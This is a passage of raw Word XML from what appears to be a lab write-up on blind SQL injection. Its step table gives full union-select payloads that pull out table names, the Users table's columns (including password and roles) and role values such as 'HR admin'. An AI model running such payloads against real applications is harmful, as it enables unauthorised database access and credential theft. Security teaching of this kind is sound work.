+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>.</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>I</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>n b), we try to find the second table name of “Secure”. To do that, we can simply add a condition to only match table name which is not “testing”. This gives us the second table name “Trainings”.</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>Next in c), we can get the third table name “Users” by guessing table name which is not either “testing” or “Trainings”.</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>W</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>e can repeat the above steps to get the fourth table name and we found that no character in the candidate charset satisfies the first character of the fourth table</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> so we know there are three tables in “Secure” in total.</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve">It might be the case that we ran out the candidate characters as mentioned in step 2 and we </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>chose to continue with just those three tables, which turned out to be alright.</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="895" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:jc w:val="center"/>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>4</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="3920" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="ListParagraph"/>
+              <w:numPr>
+                <w:ilvl w:val="0"/>
+                <w:numId w:val="10"/>
+              </w:numPr>
+              <w:ind w:firstLineChars="0"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve">' union select </w:t>
+            </w:r>
+            <w:proofErr w:type="gramStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>NULL,NULL</w:t>
+            </w:r>
+            <w:proofErr w:type="gramEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve">, </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>column_name</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> from </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>information_schema.columns</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> where </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>table_name</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>='Users'</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> having </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>substr</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>(</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>column_name</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>,1,</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>3</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>)=BINARY '</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>api</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>' limit 1 --+</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="ListParagraph"/>
+              <w:numPr>
+                <w:ilvl w:val="0"/>
+                <w:numId w:val="10"/>
+              </w:numPr>
+              <w:ind w:firstLineChars="0"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve">' union select </w:t>
+            </w:r>
+            <w:proofErr w:type="gramStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>NULL,NULL</w:t>
+            </w:r>
+            <w:proofErr w:type="gramEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve">, </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>column_name</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> from </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:lastRenderedPageBreak/>
+              <w:t>information_schema.columns</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> where </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>table_name</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve">='Users' having </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>substr</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve">(column_name,1,2)=BINARY 'id' and </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>column_name</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>&lt;&gt;'</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>api</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>' limit 1 --+</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4204" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:lastRenderedPageBreak/>
+              <w:t>In this step, all the column</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> name</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>s in the “Users” table</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> are found out</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>by doing similar things to</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> what we did in step 3.</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+            </w:pPr>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>S</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve">even columns are found in “Users” table: </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>"</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>api</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>", "id", "password", "probation", "</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>roles</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>", "username", "website"</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>.</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+            </w:pPr>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>Next</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>,</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> we want to find out what values are in column “roles” as we want to see if there are any admin users.</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="895" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:jc w:val="center"/>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>5</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>.</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="3920" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="ListParagraph"/>
+              <w:numPr>
+                <w:ilvl w:val="0"/>
+                <w:numId w:val="11"/>
+              </w:numPr>
+              <w:ind w:firstLineChars="0"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve">' union select </w:t>
+            </w:r>
+            <w:proofErr w:type="gramStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>NULL,NULL</w:t>
+            </w:r>
+            <w:proofErr w:type="gramEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve">, </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>roles</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> from </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>Users</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> having </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>substr</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>(</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>roles</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>,1,</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>4</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>)=BINARY '</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>user</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>' limit 1 --+</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="ListParagraph"/>
+              <w:numPr>
+                <w:ilvl w:val="0"/>
+                <w:numId w:val="11"/>
+              </w:numPr>
+              <w:spacing w:line="276" w:lineRule="auto"/>
+              <w:ind w:firstLineChars="0"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve">' union select </w:t>
+            </w:r>
+            <w:proofErr w:type="gramStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>NULL,NULL</w:t>
+            </w:r>
+            <w:proofErr w:type="gramEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve">, roles from Users having </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>substr</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>(roles,1,8)=BINARY 'HR admin' and roles&lt;&gt;'user' limit 1 --+</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+            </w:pPr>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4204" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>The</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>step</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> leaks all the values under the “roles” column: </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>"user", "HR admin"</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>.</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+            </w:pPr>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>N</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>ext, we want to find out who are “HR admin”.</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="895" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:jc w:val="center"/>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>6</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="3920" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve">' union select </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:proofErr w:type="gramStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>NULL,roles</w:t>
+            </w:r>
+            <w:proofErr w:type="gramEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>,username</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> from Users having</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>substr</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
